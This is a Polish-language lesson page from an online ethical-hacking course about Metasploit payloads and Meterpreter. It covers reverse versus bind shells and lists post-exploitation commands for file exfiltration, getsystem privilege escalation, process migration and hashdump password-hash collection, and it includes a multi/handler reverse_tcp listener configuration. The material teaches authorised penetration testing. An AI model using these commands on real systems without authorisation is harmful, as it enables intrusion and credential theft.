0Pricing
Ethical Hacking Academy · Lekcja

Payloady i Meterpreter

Powłoka po uzyskaniu dostępu

Payloady i Meterpreter to bezpłatna lekcja Ethical Hacking Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Ethical Hacking Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.

Czym jest payload

Payload to kod wykonywany na celu po pomyślnym wykorzystaniu exploita. Określa on, co można zrobić dalej — od uruchomienia pojedynczego polecenia po otwarcie w pełni interaktywnej powłoki.

Wybór właściwego payloadu zależy od systemu operacyjnego celu, konfiguracji sieci i wymaganego poziomu dostępu.

Staged a stageless

Payloady mogą być dostarczane na dwa sposoby:

  • Staged (proszę zwrócić uwagę na / w meterpreter/reverse_tcp): najpierw wysyłany jest mały kod pośredniczący, który następnie pobiera pełny payload. Początkowy ślad jest mniejszy.
  • Stageless (proszę zwrócić uwagę na _ w meterpreter_reverse_tcp): cały payload jest dostarczany jednocześnie. To rozwiązanie jest bardziej niezawodne w niestabilnych sieciach.

Powłoka bind a powłoka reverse

Istnieją dwa kierunki połączenia:

  • Bind shell: cel otwiera port i oczekuje na połączenie, a użytkownik łączy się z nim. Takie połączenia są często blokowane przez zapory sieciowe.
  • Reverse shell: cel łączy się z powrotem z użytkownikiem (LHOST/LPORT). Zwykle pozwala to ominąć zapory, które zezwalają na połączenia wychodzące.

Z tego powodu payloady reverse są najczęściej wybierane domyślnie.

Poznaj Meterpreter

Meterpreter to zaawansowany payload Metasploit. W przeciwieństwie do podstawowej powłoki poleceń działa w pamięci, komunikuje się przez szyfrowany kanał i oferuje bogaty zestaw poleceń do działań po uzyskaniu dostępu.

Ponieważ nie zapisuje danych na dysku, jest trudniejszy do wykrycia niż osobny plik wykonywalny.

Podstawowe polecenia Meterpreter

Po uzyskaniu sesji Meterpreter podstawowe polecenia pomagają zorientować się w środowisku celu.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

Przesyłanie plików

Meterpreter umożliwia przenoszenie plików między komputerem użytkownika a celem za pomocą prostych poleceń. Jest to przydatne do pobierania dowodów lub przygotowywania narzędzi w autoryzowanych testach.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

Przejście do powłoki systemowej

Polecenie shell przenosi z Meterpreter do natywnego interpretera poleceń celu (cmd.exe lub /bin/sh), gdy potrzebne są bezpośrednio polecenia systemu operacyjnego.

Wpisanie exit powoduje powrót do znaku zachęty Meterpreter bez utraty sesji.

shell
# C:\> whoami
# exit  -> back to meterpreter

Eskalacja uprawnień

Często uzyskuje się dostęp z ograniczonymi uprawnieniami. Meterpreter pomaga je eskalować:

  • getsystem próbuje znanych technik uzyskania uprawnień SYSTEM w systemie Windows.
  • Moduł post local_exploit_suggester proponuje exploity lokalnej eskalacji uprawnień odpowiednie dla danego hosta.

Wyższe uprawnienia umożliwiają wykradanie poświadczeń i uzyskanie głębszego dostępu.

getsystem
run post/multi/recon/local_exploit_suggester

Migracja procesów

Sesja działa wewnątrz procesu. Jeśli proces jest niestabilny lub prawdopodobnie zostanie zakończony, należy użyć polecenia migrate, aby przenieść sesję do stabilniejszego, długo działającego procesu.

Migracja do procesu odpowiadającego poziomowi uprawnień użytkownika pomaga również wtopić się w środowisko i może zmienić kontekst użytkownika.

ps
migrate 1340     # migrate into a stable PID

Utrzymywanie dostępu

Meterpreter zawiera funkcje przechwytywania przydatnych danych podczas autoryzowanych ocen bezpieczeństwa, takie jak hashdump do zbierania skrótów haseł oraz narzędzia keyscan do zademonstrowania skutków przechwytywania danych wejściowych.

Z takich możliwości należy korzystać wyłącznie w uzgodnionym zakresie, a wszystkie działania dokumentować w raporcie dla klienta.

hashdump
run post/windows/gather/checkvm

Handlery

Payload reverse wymaga nasłuchiwania po stronie użytkownika, aby przechwycić połączenie. Moduł multi/handler pełni tę funkcję. Należy skonfigurować go przy użyciu tego samego payloadu, LHOST i LPORT, które wykorzystano do wygenerowania payloadu.

Jest to niezbędne, gdy payload wygenerowany za pomocą msfvenom jest dostarczany poza konsolą: najpierw należy uruchomić handler, a następnie wyzwolić payload na celu.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

Szybkie sprawdzenie

Proszę wybrać payload, który omija restrykcyjną zaporę sieciową.

Podsumowanie

Nauczył(a) się Pan(i) korzystać z payloadów i Meterpreter:

  • Payloady mogą być staged (/), stageless (_), a także typu bind lub reverse; payload reverse zwykle lepiej omija zapory sieciowe.
  • Meterpreter działa w pamięci przez szyfrowany kanał i udostępnia bogaty zestaw poleceń.
  • Podstawowe zadania obejmują: sysinfo, getuid, ps, download/upload, shell.
  • Uprawnienia można eskalować za pomocą getsystem i local_exploit_suggester, a polecenie migrate służy do zwiększenia stabilności.
  • Z funkcji gromadzenia danych należy korzystać wyłącznie w określonym zakresie i wszystko dokumentować.

Następnie: moduły post-exploitation, pivoting i gromadzenie danych.

Często zadawane pytania

Czy lekcja „Payloady i Meterpreter” jest bezpłatna?

Tak — pełny tekst „Payloady i Meterpreter” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Ethical Hacking Academy, przejdź na CoddyKit PRO. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Payloady i Meterpreter”?

Powłoka po uzyskaniu dostępu Ćwiczysz Ethical Hacking Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Ethical Hacking Academy?

Nie wymagamy żadnego doświadczenia. Ethical Hacking Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.

Ile czasu zajmuje lekcja „Payloady i Meterpreter”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Ethical Hacking Academy?

Tak. Każda lekcja Ethical Hacking Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Architektura Metasploit
  2. Wyszukiwanie i używanie exploitów
  3. Payloady i Meterpreter
  4. Moduły po uzyskaniu dostępu
← Powrót do Ethical Hacking Academy